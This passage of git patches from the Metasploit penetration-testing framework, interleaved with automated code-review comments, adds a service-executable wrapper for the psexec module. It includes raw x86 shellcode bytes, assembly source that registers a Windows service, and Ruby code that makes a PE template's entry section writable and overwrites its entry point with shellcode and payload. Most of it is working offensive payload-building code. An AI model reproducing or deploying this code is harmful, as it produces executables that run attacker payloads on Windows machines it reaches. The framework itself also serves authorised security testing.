res.get_cookies res = send_request_cgi( { 'uri' => "/help/wwhelp/wwhimpl/common/html/default.htm", 'method' => 'GET', - 'cookie' => '#{cookie}' + 'cookie' => cookie }) if (res and res.code == 200 and res.body.include?('Cisco IronPort AsyncOS')) @@ -135,7 +135,7 @@ class Metasploit3 < Msf::Auxiliary } }) - if (res and res.headers['Set-Cookie'].include?('authenticated=')) + if res and res.get_cookies.include?('authenticated=') print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_hash = { 
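Review bot: In cisco_ironport_enum.rb, `if res && res.get_cookies` no longer tests whether a cookie was set, because any String is truthy in Ruby, including an empty one. If `get_cookies` returns "" when the response carries no Set-Cookie header (worth confirming), the follow-up request is sent with an empty cookie value; `if res && !res.get_cookies.empty?` keeps the old meaning. The same hunk replaces `split('; ')[0]` with the whole cookie string, as the osb_execqr2.rb and osb_execqr3.rb hunks do, so every cookie is now forwarded rather than only the first. That behaviour change deserves a line in the commit message if it is intended.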
diff --git a/tools/msftidy.rb b/tools/msftidy.rb index ae7072ff77..8c5d82458d 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb @@ -476,8 +476,8 @@ class Msftidy error("datastore is modified in code: #{ln}", idx) end - # do not read Set-Cookie header - if ln =~ /\[['"]Set-Cookie['"]\]/i + # do not read Set-Cookie header (ignore commented lines) + if ln =~ /^(?!\s*#).+\[['"]Set-Cookie['"]\]/i warn("Do not read Set-Cookie header directly, use res.get_cookies instead: #{ln}", idx) end From 513f3de0f829f19eb0b84cc02fcb558a6b7876e3 Mon Sep 17 00:00:00 2001 From: Florian Gaultier Date: Sun, 17 Nov 2013 18:46:10 +0100 Subject: [PATCH 288/853] new service exe creation refreshed --- .../windows/x86/src/block/block_service.asm | 64 +++++++++++++++ .../x86/src/single/single_service_stuff.asm | 17 ++++ lib/msf/util/exe.rb | 79 +++++++++++++++---- modules/exploits/windows/smb/psexec.rb | 1 + 4 files changed, 146 insertions(+), 15 deletions(-) create mode 100644 external/source/shellcode/windows/x86/src/block/block_service.asm create mode 100644 external/source/shellcode/windows/x86/src/single/single_service_stuff.asm diff --git a/external/source/shellcode/windows/x86/src/block/block_service.asm b/external/source/shellcode/windows/x86/src/block/block_service.asm new file mode 100644 index 0000000000..cae63fcd34 --- /dev/null +++ b/external/source/shellcode/windows/x86/src/block/block_service.asm 
@@ -0,0 +1,64 @@ +;-----------------------------------------------------------------------------; +; Author: agix (florian.gaultier[at]gmail[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Size: 137 bytes +;-----------------------------------------------------------------------------; + +[BITS 32] +; Input: EBP must be the address of 'api_call'. + +push byte 0x0 +push 0x32336970 +push 0x61766461 +push esp +push 0x726774c +call ebp ;load advapi32.dll +push 0x00454349 +push 0x56524553 +mov ecx, esp ;ServiceTableEntry.SVCNAME +lea eax, [ebp+0xd0];ServiceTableEntry.SvcMain +push 0x00000000 +push eax +push ecx +mov eax,esp +push 0x00000000 +push eax +push 0xCB72F7FA +call ebp ;call StartServiceCtrlDispatcherA(ServiceTableEntry) +push 0x00000000 +push 0x56A2B5F0 +call ebp ;call ExitProcess(0) +pop eax ;SvcCtrlHandler +pop eax +pop eax +pop eax +xor eax,eax +ret +cld ;SvcMain +call me +me: +pop ebp +sub ebp, 0xd6 ;ebp => hashFunction +push 0x00464349 +push 0x56524553 +mov ecx, esp ;SVCNAME +lea eax, [ebp+0xc9];SvcCtrlHandler +push 0x00000000 +push eax +push ecx +push 0x5244AA0B +call ebp ;RegisterServiceCtrlHandlerExA +push 0x00000000 +push 0x00000000 +push 0x00000000 +push 0x00000000 +push 0x00000000 +push 0x00000000 +push 0x00000004 +push 0x00000010 +mov ecx, esp +push 0x00000000 +push ecx +push eax +push 0x7D3755C6 +call ebp ;SetServiceStatus RUNNING \ No newline at end of file diff --git a/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm new file mode 100644 index 0000000000..e5aad30bcf --- /dev/null +++ b/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm 
@@ -0,0 +1,17 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (28 July 2009) +; Size: 189 bytes + strlen(libpath) + 1 +; Build: >build.py single_service_stuff +;-----------------------------------------------------------------------------; + +[BITS 32] +[ORG 0] + + cld ; Clear the direction flag. + call start ; Call start, this pushes the address of 'api_call' onto the stack. +%include "./src/block/block_api.asm" +start: ; + pop ebp ; pop off the address of 'api_call' for calling later. +%include "./src/block/block_service.asm" \ No newline at end of file diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 55381967d2..485b1ef217 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb 
@@ -392,32 +392,81 @@ require 'msf/core/exe/segment_injector' case opts[:exe_type] when :service_exe + exe = Rex::PeParsey::Pe.new_from_file(opts[:template], true) max_length = 8192 name = opts[:servicename] - if name - bo = pe.index('SERVICENAME') - raise RuntimeError, "Invalid PE Service EXE template: missing \"SERVICENAME\" tag" if not bo - pe[bo, 11] = [name].pack('a11') + if not name + name = Rex::Text.rand_text_alpha(7) + end + #code_service could be encoded in the future + code_service = + "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + + "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + + "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + + "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + + "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + + "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + + "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" + + "\x26\x07\xFF\xD5\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1" + + "\x8D\x85\xD0\x00\x00\x00\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" + + "\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" + + "\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED\xD6" + + "\x00\x00\x00\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1\x8D" + + "\x85\xC9\x00\x00\x00\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" + + "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" + + "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5" + + pe_header_size=0x18 + section_size=0x28 + characteristics_offset=0x24 + virtualAddress_offset=0xc + sizeOfRawData_offset=0x10 + + sections_table_rva = 
exe._dos_header.v['e_lfanew']+exe._file_header.v['SizeOfOptionalHeader']+pe_header_size + sections_table_offset = exe.rva_to_file_offset(sections_table_rva) + sections_table_characteristics_offset = exe.rva_to_file_offset(sections_table_rva+characteristics_offset) + + sections_header = [] + exe._file_header.v['NumberOfSections'].times { |i| + sections_header << [sections_table_characteristics_offset+(i*section_size),pe[sections_table_offset+(i*section_size),section_size]] + } + + #look for section with entry point + sections_header.each do |sec| + virtualAddress = sec[1][virtualAddress_offset,0x4].unpack('L')[0] + sizeOfRawData = sec[1][sizeOfRawData_offset,0x4].unpack('L')[0] + characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0] + if exe.hdr.opt.AddressOfEntryPoint >= virtualAddress && exe.hdr.opt.AddressOfEntryPoint < virtualAddresssizeOfRawData + #put this section writable + characteristics|=0x80000000 + newcharacteristics = [characteristics].pack('L') + pe[sec[0],newcharacteristics.length]=newcharacteristics + end end - if not opts[:sub_method] - pe[136, 4] = [rand(0x100000000)].pack('V') - end + #put the shellcode at the entry point, overwriting template + pe[exe.rva_to_file_offset(exe.hdr.opt.AddressOfEntryPoint),code_service.length+code.length]=code_service+code + when :dll max_length = 2048 when :exe_sub max_length = 4096 end - bo = pe.index('PAYLOAD:') - raise RuntimeError, "Invalid PE EXE subst template: missing \"PAYLOAD:\" tag" if not bo + if opts[:exe_type] != :service_exe - if (code.length <= max_length) - pe[bo, code.length] = [code].pack("a*") - else - raise RuntimeError, "The EXE generator now has a max size of #{max_length} bytes, please fix the calling module" - end + bo = pe.index('PAYLOAD:') + raise RuntimeError, "Invalid PE EXE subst template: missing \"PAYLOAD:\" tag" if not bo + + if (code.length <= max_length) + pe[bo, code.length] = [code].pack("a*") + else + raise RuntimeError, "The EXE generator now has a max size of 
#{max_length} bytes, please fix the calling module" + end if opts[:exe_type] == :dll mt = pe.index('MUTEX!!!') @@ -464,7 +513,7 @@ require 'msf/core/exe/segment_injector' def self.to_win32pe_service(framework, code, opts={}) # Allow the user to specify their own service EXE template - set_template_default(opts, "template_x86_windows_svc.exe") + set_template_default(opts, "template_x86_windows.exe") opts[:exe_type] = :service_exe exe_sub_method(code,opts) end diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index 68badfeef6..88d59f07d6 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb @@ -152,6 +152,7 @@ class Metasploit3 < Msf::Exploit::Remote # Disconnect from the ADMIN$ simple.disconnect("ADMIN$") else + servicename = rand_text_alpha(8) servicedescription = datastore['SERVICE_DESCRIPTION'] From 72a3e49fbb104d00e648f64f9e8082972867d891 Mon Sep 17 00:00:00 2001 From: Florian Gaultier Date: Sun, 17 Nov 2013 19:01:57 +0100 Subject: [PATCH 289/853] fix typo --- lib/msf/util/exe.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 485b1ef217..284ed99278 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -440,7 +440,7 @@ require 'msf/core/exe/segment_injector' virtualAddress = sec[1][virtualAddress_offset,0x4].unpack('L')[0] sizeOfRawData = sec[1][sizeOfRawData_offset,0x4].unpack('L')[0] characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0] - if exe.hdr.opt.AddressOfEntryPoint >= virtualAddress && exe.hdr.opt.AddressOfEntryPoint < virtualAddresssizeOfRawData + if exe.hdr.opt.AddressOfEntryPoint >= virtualAddress && exe.hdr.opt.AddressOfEntryPoint < virtualAddress+sizeOfRawData #put this section writable characteristics|=0x80000000 newcharacteristics = [characteristics].pack('L') From b3fd21b98d037fc69d66eb3769cef5540557dde5 Mon Sep 17 00:00:00 2001 
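Review bot: The added `if opts[:exe_type] != :service_exe` in lib/msf/util/exe.rb has no matching `end` as far as this hunk shows. Only the inner `if (code.length <= max_length)` is closed before the unchanged `if opts[:exe_type] == :dll` line, so the file may not parse unless an `end` exists outside the visible lines. Moving the length check inside that condition also leaves `max_length = 8192` in the `:service_exe` branch assigned but never used, so that branch writes `code_service+code` with no size check while the other types still raise. Closing the block before the `:dll` handling and giving the service branch its own `raise RuntimeError` guard would restore the previous contract. The method starts and ends outside the hunk.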
From: Florian Gaultier Date: Wed, 20 Nov 2013 22:44:19 +0100 Subject: [PATCH 290/853] Change to try to follow ruby guidelines --- lib/msf/util/exe.rb | 84 +++++++++++++++++++++++++-------------------- 1 file changed, 47 insertions(+), 37 deletions(-) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 284ed99278..721193d25b 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb 
@@ -396,60 +396,70 @@ require 'msf/core/exe/segment_injector' max_length = 8192 name = opts[:servicename] - if not name - name = Rex::Text.rand_text_alpha(7) - end - #code_service could be encoded in the future + name ||= Rex::Text.rand_text_alpha(7) + + # code_service could be encoded in the future code_service = - "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + - "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + - "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + - "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + - "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + - "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + - "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + - "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + - "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + - "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" + - "\x26\x07\xFF\xD5\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1" + - "\x8D\x85\xD0\x00\x00\x00\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" + - "\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" + - "\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED\xD6" + - "\x00\x00\x00\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1\x8D" + - "\x85\xC9\x00\x00\x00\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" + - "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" + - "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5" + "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + + "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + + "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + + "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + + "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" 
+ + "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + + "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" + + "\x26\x07\xFF\xD5\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1" + + "\x8D\x85\xD0\x00\x00\x00\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" + + "\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" + + "\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED\xD6" + + "\x00\x00\x00\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1\x8D" + + "\x85\xC9\x00\x00\x00\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" + + "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" + + "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5" - pe_header_size=0x18 - section_size=0x28 - characteristics_offset=0x24 - virtualAddress_offset=0xc - sizeOfRawData_offset=0x10 + pe_header_size = 0x18 + section_size = 0x28 + characteristics_offset = 0x24 + virtualAddress_offset = 0x0c + sizeOfRawData_offset = 0x10 + + sections_table_rva = + exe._dos_header.v['e_lfanew'] + + exe._file_header.v['SizeOfOptionalHeader'] + + pe_header_size - sections_table_rva = exe._dos_header.v['e_lfanew']+exe._file_header.v['SizeOfOptionalHeader']+pe_header_size sections_table_offset = exe.rva_to_file_offset(sections_table_rva) - sections_table_characteristics_offset = exe.rva_to_file_offset(sections_table_rva+characteristics_offset) + + sections_table_characteristics_offset = + exe.rva_to_file_offset(sections_table_rva + characteristics_offset) sections_header = [] exe._file_header.v['NumberOfSections'].times { |i| - sections_header << [sections_table_characteristics_offset+(i*section_size),pe[sections_table_offset+(i*section_size),section_size]] + section_offset = sections_table_offset + (i * section_size) + sections_header << [ + sections_table_characteristics_offset + (i * section_size), + 
pe[section_offset,section_size] + ] } - #look for section with entry point + # look for section with entry point sections_header.each do |sec| virtualAddress = sec[1][virtualAddress_offset,0x4].unpack('L')[0] sizeOfRawData = sec[1][sizeOfRawData_offset,0x4].unpack('L')[0] characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0] - if exe.hdr.opt.AddressOfEntryPoint >= virtualAddress && exe.hdr.opt.AddressOfEntryPoint < virtualAddress+sizeOfRawData - #put this section writable - characteristics|=0x80000000 + + if (virtualAddress...virtualAddress+sizeOfRawData).include?(exe.hdr.opt.AddressOfEntryPoint) + # put this section writable + characteristics |= 0x8000_0000 newcharacteristics = [characteristics].pack('L') - pe[sec[0],newcharacteristics.length]=newcharacteristics + pe[sec[0],newcharacteristics.length] = newcharacteristics end end - #put the shellcode at the entry point, overwriting template - pe[exe.rva_to_file_offset(exe.hdr.opt.AddressOfEntryPoint),code_service.length+code.length]=code_service+code + # put the shellcode at the entry point, overwriting template + pe[exe.rva_to_file_offset(exe.hdr.opt.AddressOfEntryPoint),code_service.length + code.length] = code_service + code when :dll max_length = 2048 From ca7a2c7a367cf3a07357ccf9b394904a6df8aae7 Mon Sep 17 00:00:00 2001 From: Florian Gaultier Date: Tue, 17 Dec 2013 15:31:02 +0100 Subject: [PATCH 291/853] Add string_to_pushes to use non fixed size service_name --- lib/msf/util/exe.rb | 32 +++++++++++++++++++++++--- modules/exploits/windows/smb/psexec.rb | 1 - 2 files changed, 29 insertions(+), 4 deletions(-) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 721193d25b..bf0ecd90d3 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb 
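Review bot: The new offset names `virtualAddress_offset` and `sizeOfRawData_offset` mix camelCase into snake_case identifiers, which is at odds with the Ruby conventions this commit sets out to follow. `virtual_address_offset = 0x0c` and `size_of_raw_data_offset = 0x10` would match `section_size` and `characteristics_offset` declared beside them. The multi-line `exe._file_header.v['NumberOfSections'].times { |i| ... }` block would conventionally be written `do |i| ... end`. The `:service_exe` branch of `exe_sub_method` starts above this hunk and the `case` continues below it.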
@@ -383,6 +383,27 @@ require 'msf/core/exe/segment_injector' return pe end + def self.string_to_pushes(str) + # Align string to 4 bytes + rem = (str.length) % 4 + if (rem > 0) + str << "\x00" * (4 - rem) + pushes = '' + else + pushes = "h\x00\x00\x00\x00" + end + # string is now 4 bytes aligned with null byte + + # push string to stack, starting at the back + while (str.length > 0) + four = 'h'+str.slice!(-4,4) + pushes << four + end + + pushes + end + + def self.exe_sub_method(code,opts ={}) pe = '' @@ -398,6 +419,8 @@ require 'msf/core/exe/segment_injector' name ||= Rex::Text.rand_text_alpha(7) + pushed_service_name = string_to_pushes(name) + # code_service could be encoded in the future code_service = "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + @@ -410,11 +433,11 @@ require 'msf/core/exe/segment_injector' "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" + - "\x26\x07\xFF\xD5\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1" + + "\x26\x07\xFF\xD5"+pushed_service_name+"\x89\xE1" + "\x8D\x85\xD0\x00\x00\x00\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" + "\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" + "\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED\xD6" + - "\x00\x00\x00\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1\x8D" + + "\x00\x00\x00"+pushed_service_name+"\x89\xE1\x8D" + "\x85\xC9\x00\x00\x00\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" + "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" + "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5" 
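Review bot: `string_to_pushes` modifies the string it is given: `str << "\x00" * (4 - rem)` pads the caller's object and the `str.slice!(-4,4)` loop then consumes it, so the argument is empty once the method returns. The later hunks in this patch pass `name`, which is `opts[:servicename]` itself whenever the caller set one, so the caller's option value is emptied as a side effect. Working on a copy avoids that, for example `str = str.dup` as the first line of the method. Separately, `str.length` counts characters rather than bytes, so `str.bytesize` is the safer measure for the 4-byte alignment if a non-ASCII name can reach this method.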
@@ -459,7 +482,10 @@ require 'msf/core/exe/segment_injector' end # put the shellcode at the entry point, overwriting template - pe[exe.rva_to_file_offset(exe.hdr.opt.AddressOfEntryPoint),code_service.length + code.length] = code_service + code + entryPoint_file_offset = exe.rva_to_file_offset(exe.hdr.opt.AddressOfEntryPoint) + my_payload_length = code_service.length + code.length + payload_service = code_service + code + pe[entryPoint_file_offset,my_payload] = payload_service when :dll max_length = 2048 diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index 88d59f07d6..68badfeef6 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb @@ -152,7 +152,6 @@ class Metasploit3 < Msf::Exploit::Remote # Disconnect from the ADMIN$ simple.disconnect("ADMIN$") else - servicename = rand_text_alpha(8) servicedescription = datastore['SERVICE_DESCRIPTION'] From 914d15c285fcc6a18a5d40c6ee3015461da22d00 Mon Sep 17 00:00:00 2001 From: Florian Gaultier Date: Tue, 17 Dec 2013 15:47:17 +0100 Subject: [PATCH 292/853] fix typo --- lib/msf/util/exe.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index bf0ecd90d3..6c947778cf 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -485,7 +485,7 @@ require 'msf/core/exe/segment_injector' entryPoint_file_offset = exe.rva_to_file_offset(exe.hdr.opt.AddressOfEntryPoint) my_payload_length = code_service.length + code.length payload_service = code_service + code - pe[entryPoint_file_offset,my_payload] = payload_service + pe[entryPoint_file_offset,my_payload_length] = payload_service when :dll max_length = 2048 From 0b462ceea64aec43dc38d7b3229ccb8a3dc7eb95 Mon Sep 17 00:00:00 2001 
From: Florian Gaultier
Date: Thu, 26 Dec 2013 12:50:42 +0100
Subject: [PATCH 293/853] refactor `to_winpe_only` code to be used by `to_win32pe_service`
---
lib/msf/util/exe.rb | 177 ++++++++++++++++++++------------------------
1 file changed, 82 insertions(+), 95 deletions(-)
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index 6c947778cf..80314f3f83 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -314,25 +314,48 @@ require 'msf/core/exe/segment_injector' exe = fd.read(fd.stat.size) } + pe_header_size = 0x18 + section_size = 0x28 + characteristics_offset = 0x24 + virtualAddress_offset = 0x0c + sizeOfRawData_offset = 0x10 + + sections_table_rva = + pe._dos_header.v['e_lfanew'] + + pe._file_header.v['SizeOfOptionalHeader'] + + pe_header_size + + sections_table_offset = pe.rva_to_file_offset(sections_table_rva) + + sections_table_characteristics_offset = + pe.rva_to_file_offset(sections_table_rva + characteristics_offset) + sections_header = [] - pe._file_header.v['NumberOfSections'].times { |i| sections_header << [(i*0x28)+pe.rva_to_file_offset(pe._dos_header.v['e_lfanew']+pe._file_header.v['SizeOfOptionalHeader']+0x18+0x24),exe[(i*0x28)+pe.rva_to_file_offset(pe._dos_header.v['e_lfanew']+pe._file_header.v['SizeOfOptionalHeader']+0x18),0x28]] } + pe._file_header.v['NumberOfSections'].times { |i| + section_offset = sections_table_offset + (i * section_size) + sections_header << [ + sections_table_characteristics_offset + (i * section_size), + exe[section_offset,section_size] + ] + } - - #look for section with entry point + # look for section with entry point sections_header.each do |sec| - virtualAddress = sec[1][0xc,0x4].unpack('L')[0] - sizeOfRawData = sec[1][0x10,0x4].unpack('L')[0] - characteristics = sec[1][0x24,0x4].unpack('L')[0] - if pe.hdr.opt.AddressOfEntryPoint >= virtualAddress && pe.hdr.opt.AddressOfEntryPoint < virtualAddress+sizeOfRawData - #put this section writable - characteristics|=0x80000000 + virtualAddress = sec[1][virtualAddress_offset,0x4].unpack('L')[0] + sizeOfRawData = sec[1][sizeOfRawData_offset,0x4].unpack('L')[0] + characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0] + + if (virtualAddress...virtualAddress+sizeOfRawData).include?(pe.hdr.opt.AddressOfEntryPoint) + # put this section writable + characteristics |= 0x8000_0000 newcharacteristics = [characteristics].pack('L') - 
exe[sec[0],newcharacteristics.length]=newcharacteristics + exe[sec[0],newcharacteristics.length] = newcharacteristics end end - #put the shellcode at the entry point, overwriting template - exe[pe.rva_to_file_offset(pe.hdr.opt.AddressOfEntryPoint),code.length]=code + # put the shellcode at the entry point, overwriting template + entryPoint_file_offset = pe.rva_to_file_offset(pe.hdr.opt.AddressOfEntryPoint) + exe[entryPoint_file_offset,code.length] = code return exe end @@ -403,7 +426,6 @@ require 'msf/core/exe/segment_injector' pushes end - def self.exe_sub_method(code,opts ={}) pe = '' 
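Review bot: The section-header fields added here are decoded with `unpack('L')` and written back with `pack('L')`, which in Ruby use the host's native byte order, whereas PE header fields are little-endian. The result is only correct on little-endian hosts. `.unpack('V')[0]` for the three reads and `[characteristics].pack('V')` for the write state the on-disk format explicitly, the way `pack('V')` is already used in `exe_sub_method` in this same patch. `to_winpe_only` starts above this hunk.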
@@ -413,96 +435,32 @@ require 'msf/core/exe/segment_injector' case opts[:exe_type] when :service_exe - exe = Rex::PeParsey::Pe.new_from_file(opts[:template], true) max_length = 8192 name = opts[:servicename] - name ||= Rex::Text.rand_text_alpha(7) - - pushed_service_name = string_to_pushes(name) - - # code_service could be encoded in the future - code_service = - "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + - "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + - "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + - "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + - "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + - "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + - "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + - "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + - "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + - "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" + - "\x26\x07\xFF\xD5"+pushed_service_name+"\x89\xE1" + - "\x8D\x85\xD0\x00\x00\x00\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" + - "\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" + - "\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED\xD6" + - "\x00\x00\x00"+pushed_service_name+"\x89\xE1\x8D" + - "\x85\xC9\x00\x00\x00\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" + - 